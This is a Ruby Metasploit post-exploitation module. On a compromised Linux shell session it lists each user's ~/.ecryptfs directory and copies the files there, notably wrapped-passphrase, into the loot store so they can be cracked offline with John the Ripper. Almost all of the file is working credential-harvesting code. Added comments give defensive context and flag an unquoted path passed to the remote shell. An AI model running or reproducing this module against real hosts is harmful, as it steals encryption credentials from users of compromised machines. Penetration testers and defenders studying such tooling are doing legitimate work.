Path: blob/master/modules/post/linux/gather/ecryptfs_creds.rb
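##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module for Linux shell sessions that copies the files found directly
# inside each user's ~/.ecryptfs directory into the framework's loot store.
#
# Defensive context: the files read here (notably "wrapped-passphrase") are
# credential material. The wrapped passphrase can be attacked offline once
# copied, so its resistance depends on the strength of the passphrase that
# wraps it. Reads of ~/.ecryptfs by anything other than the owning user's
# login/mount tooling are a useful signal to audit for on hosts that use
# eCryptfs.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  # Registers the module metadata (name, description, platform, session type).
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gather eCryptfs Metadata',
        # Fixed: the description previously said ".ecrypts", but the code
        # below reads ".ecryptfs".
        'Description' => %q{
          This module will collect the contents of all users' .ecryptfs directories on
          the targeted machine. Collected "wrapped-passphrase" files can be
          cracked with John the Ripper (JtR) to recover "mount passphrases".
        },
        'License' => MSF_LICENSE,
        'Author' => ['Dhiru Kholia <dhiru[at]openwall.com>'],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell']
      )
    )
  end

  # This module is largely based on ssh_creds, gpg_creds and firefox_creds.rb.

  # Entry point: builds the candidate <home>/.ecryptfs path for every user
  # directory, keeps the ones that exist as directories, and hands them to
  # download_loot. Prints an error and returns when none exist.
  #
  # @return [void]
  def run
    print_status('Finding .ecryptfs directories')
    candidates = enum_user_directories.map { |d| d + '/.ecryptfs' }
    # Array#select! is only in 1.9
    paths = candidates.select { |d| directory?(d) }

    # Array#select always returns an Array, so only emptiness needs checking.
    if paths.empty?
      print_error('No users found with a .ecryptfs directory')
      return
    end

    download_loot(paths)
  end

  # Lists each directory with `ls -1`, skips sub-directories, and stores every
  # remaining file as loot of type "ecryptfs.<filename>".
  #
  # @param paths [Array<String>] .ecryptfs directories to collect from
  # @return [void]
  def download_loot(paths)
    print_status("Looting #{paths.count} directories")
    sep = '/'

    paths.each do |path|
      # Work on a copy so the caller's strings are not mutated.
      dir_path = path.chomp

      # NOTE(review): dir_path is interpolated into the shell command without
      # quoting. A home directory name containing whitespace or shell
      # metacharacters will be mis-parsed by the remote shell; quote/escape
      # the path before building the command.
      files = cmd_exec("ls -1 #{dir_path}").split(/\r\n|\r|\n/)

      files.each do |file|
        target = "#{dir_path}#{sep}#{file}"
        next if directory?(target)

        print_status("Downloading #{target} -> #{file}")
        data = read_file(target)
        # Keep only the final path component for the loot name.
        file = file.split(sep).last
        loot_path = store_loot("ecryptfs.#{file}", 'text/plain', session, data,
                               nil, "eCryptfs #{file} File")
        print_good("File stored in: #{loot_path}")
      end
    end
  end
end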